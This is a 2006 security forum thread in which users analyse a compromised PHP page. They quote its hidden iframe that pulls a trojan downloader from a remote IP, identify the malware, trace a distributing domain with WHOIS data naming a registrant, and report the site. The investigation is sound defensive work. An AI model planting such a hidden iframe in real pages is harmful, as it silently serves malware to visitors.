-
August 7th, 2006, 03:00 AM
#11
FYI, that PHP page has a hidden iFrame that is pulling down a page from some site on IP 85.255.113.10.
<iframe width=2 height=2 style=visibility:hidden src='http://85.255.113.10/?to=GLAC&from=se-all&type=se-all'></iframe>
That site is down with a message saying the account is suspected due to violation of AUP - good.
Kinda hoped to pull down that horsie and analyze and disect it, oh well.
-
August 7th, 2006, 04:34 AM
#12
Originally posted here by ric-o
FYI, that PHP page has a hidden iFrame that is pulling down a page from some site on IP 85.255.113.10.
That site is down with a message saying the account is suspected due to violation of AUP - good.
Kinda hoped to pull down that horsie and analyze and disect it, oh well.
Still a live link, just got another (same one as before) Trojan in my Quar.
W32/Sober@MM!M681
Get some good religion from Bad Religion.
-
August 7th, 2006, 02:09 PM
#13
http ://85.255.113.10/ ?to=GLAC&from=se-all&type= se-all
One Whois lookup says its from the Ukraine.... another says its from Belarus:
Country fraud profile: High
Georgia prison wardens......Ukranian mafioso....
Hmmm
%42%75%75%75%75%72%70%21%00
-
August 8th, 2006, 12:13 AM
#14
One Whois lookup says its from the Ukraine.... another says its from Belarus:
same area of land
and Georgia is also out there too
not just in the USofA
maybe that's how you picked such a lovely site
and clicking the link sent AVG nuts
got two hits
those two hits have different dates on em
but I am certain I've checked the vault recently, and I haven't sent anything else there for a while
so now I'm in my SIXTIES FFS
WTAF, how did that happen, so no more alterations to the sig, it will remain as is now
Beware of Geeks bearing GIF's
come and waste the day :P at The Taz Zone
-
August 8th, 2006, 01:45 AM
#15
!!!!!!!!!!
No response via telephone to the site host, sent a very polite e-mail, we will see if they respond. I have my doubts.
Get some good religion from Bad Religion.
-
August 8th, 2006, 02:10 AM
#16
There is only one constant, one universal, it is the only real truth: causality. Action. Reaction. Cause and effect...There is no escape from it, we are forever slaves to it. Our only hope, our only peace is to understand it, to understand the 'why'. 'Why' is what separates us from them, you from me. 'Why' is the only real social power, without it you are powerless.
(Merovingian - Matrix Reloaded)
-
August 8th, 2006, 01:33 PM
#17
Nihil, i've already submitted them, i did so about 30minutes after catching them into an contained environment.
cheers
acidtone..
-
August 8th, 2006, 05:19 PM
#18
Get some good religion from Bad Religion.
-
August 9th, 2006, 07:33 PM
#19
The continuing saga
Damnit I am obsessed!
OK so I just can't let this one go, after Zero response to both methods (telephone, and e-mail) to the host of the offending website, I am once again digging for more info.
I did report it to DShield, and they are so backed up it will take a while for them to "act", which means they will send an e-mail to the Sysadmin, and hope that action will be taken. Basically the same thing I have attempted.
Knowing that the Horsie is there, I have no fear in rooting around within the site. I noticed today that the actual Trojan originates from the following site. Apparently notorious for this activity and also registered in Russia..........good luck getting any results from these guys right?
The site you will notice serves no purpose, other than to support the Downloader/Trojan, and god knows what else.
http://proffy209.com/
Dig-
Registrant:
Boris D Gorbunov boris@bo.ca
7.49800872092
Boris D Gorbunov
Proletarskaya 3-10
Nijnoy Novgorod Nijniy Novgorod RUSSIAN FEDERATION 180092
Domain Name: proffy209.com
Record last updated at 2006-07-13 12: 42: 55
Record created on 2006/7/13
Record expired on 2007/7/13
Domain servers in listed order:
ns1.game4all.biz ns2.game4all.biz
Administrator:
name: (Boris D Gorbunov)
Email: boris@bo.ca
tel-- 7.49800872092
Boris D Gorbunov
Proletarskaya 3-10
Boris I would like to kick your Caviar eating a$$.
The Virus itself is also known as TR/Dldr.Tibs.C, which copies itself to • %SYSDIR%\kernels8.exe, is a Multifaceted little bugger.
Further info can be found @ link below.
http://www.avira.com/en/threats/sect...dr.tibs.c.html
Any thoughts/Ideas/suggestions regarding these A$$hats would be great. I am on a mission.
Get some good religion from Bad Religion.
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|